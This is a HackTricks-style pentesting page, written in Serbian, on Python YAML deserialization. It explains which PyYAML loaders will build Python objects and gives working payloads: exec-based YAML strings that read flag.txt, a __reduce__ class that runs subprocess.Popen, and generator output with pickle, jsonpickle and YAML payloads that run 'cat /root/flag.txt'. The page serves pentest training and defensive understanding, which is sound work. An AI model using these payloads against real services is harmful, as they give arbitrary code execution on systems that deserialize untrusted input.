# Python Yaml Deserialization {{#include ../../banners/hacktricks-training.md}} ## Yaml **Deserialization** **Yaml** python biblioteke su takođe sposobne da **serijalizuju python objekte** i ne samo sirove podatke: ``` print(yaml.dump(str("lol"))) lol ... print(yaml.dump(tuple("lol"))) !!python/tuple - l - o - l print(yaml.dump(range(1,10))) !!python/object/apply:builtins.range - 1 - 10 - 1 ``` Proverite kako **tuple** nije sirov tip podataka i stoga je **serializovan**. Ista stvar se desila i sa **range** (uzet iz builtins). ![](<../../images/image (1040).png>) **safe_load()** ili **safe_load_all()** koristi SafeLoader i **ne podržava deserializaciju objekata klasa**. Primer deserializacije objekta klase: ```python import yaml from yaml import UnsafeLoader, FullLoader, Loader data = b'!!python/object/apply:builtins.range [1, 10, 1]' print(yaml.load(data, Loader=UnsafeLoader)) #range(1, 10) print(yaml.load(data, Loader=Loader)) #range(1, 10) print(yaml.load_all(data)) # print(yaml.load_all(data, Loader=Loader)) # print(yaml.load_all(data, Loader=UnsafeLoader)) # print(yaml.load_all(data, Loader=FullLoader)) # print(yaml.unsafe_load(data)) #range(1, 10) print(yaml.full_load_all(data)) # print(yaml.unsafe_load_all(data)) # #The other ways to load data will through an error as they won't even attempt to #deserialize the python object ``` Prethodni kod je koristio **unsafe_load** za učitavanje serijalizovane python klase. To je zato što u **verziji >= 5.1**, ne dozvoljava **deserijalizaciju bilo koje serijalizovane python klase ili atributa klase**, bez specificiranog Loader-a u load() ili Loader=SafeLoader. ### Osnovni Eksploit Primer kako da **izvršite sleep**: ```python import yaml from yaml import UnsafeLoader, FullLoader, Loader data = b'!!python/object/apply:time.sleep [2]' print(yaml.load(data, Loader=UnsafeLoader)) #Executed print(yaml.load(data, Loader=Loader)) #Executed print(yaml.load_all(data)) print(yaml.load_all(data, Loader=Loader)) print(yaml.load_all(data, Loader=UnsafeLoader)) print(yaml.load_all(data, Loader=FullLoader)) print(yaml.unsafe_load(data)) #Executed print(yaml.full_load_all(data)) print(yaml.unsafe_load_all(data)) ``` ### Ranjiva .load("\") bez Loader-a **Stare verzije** pyyaml-a su bile ranjive na napade deserializacije ako **niste naveli Loader** prilikom učitavanja nečega: `yaml.load(data)` Možete pronaći [**opis ranjivosti ovde**](https://hackmd.io/@defund/HJZajCVlP)**.** Predloženi **eksploit** na toj stranici je: ```yaml !!python/object/new:str state: !!python/tuple - 'print(getattr(open("flag\x2etxt"), "read")())' - !!python/object/new:Warning state: update: !!python/name:exec ``` Ili možete koristiti ovu **jednu liniju koju je pružio @ishaack**: ```yaml !!python/object/new:str { state: !!python/tuple [ 'print(exec("print(o"+"pen(\"flag.txt\",\"r\").read())"))', !!python/object/new:Warning { state: { update: !!python/name:exec } }, ], } ``` Napomena da u **novijim verzijama** više ne možete **pozvati `.load()`** **bez `Loader`-a** i da **`FullLoader`** više nije **ranjiv** na ovaj napad. ## RCE Prilagođeni payloadi se mogu kreirati koristeći Python YAML module kao što su **PyYAML** ili **ruamel.yaml**. Ovi payloadi mogu iskoristiti ranjivosti u sistemima koji deserializuju nepouzdane ulaze bez pravilne sanitizacije. ```python import yaml from yaml import UnsafeLoader, FullLoader, Loader import subprocess class Payload(object): def __reduce__(self): return (subprocess.Popen,('ls',)) deserialized_data = yaml.dump(Payload()) # serializing data print(deserialized_data) #!!python/object/apply:subprocess.Popen #- ls print(yaml.load(deserialized_data, Loader=UnsafeLoader)) print(yaml.load(deserialized_data, Loader=Loader)) print(yaml.unsafe_load(deserialized_data)) ``` ### Alat za kreiranje Payload-a Alat [https://github.com/j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) može se koristiti za generisanje python deserialization payload-a za zloupotrebu **Pickle, PyYAML, jsonpickle i ruamel.yaml:** ```bash python3 peas.py Enter RCE command :cat /root/flag.txt Enter operating system of target [linux/windows] . Default is linux :linux Want to base64 encode payload ? [N/y] : Enter File location and name to save :/tmp/example Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :All Done Saving file !!!! cat /tmp/example_jspick {"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["cat", "/root/flag.txt"]}]}]} cat /tmp/example_pick | base64 -w0 gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSFlFKULg== cat /tmp/example_yaml !!python/object/apply:subprocess.Popen - !!python/tuple - cat - /root/flag.txt ``` ### Reference - [https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf) - [https://net-square.com/yaml-deserialization-attack-in-python.html](https://net-square.com/yaml-deserialization-attack-in-python.html) {{#include ../../banners/hacktricks-training.md}}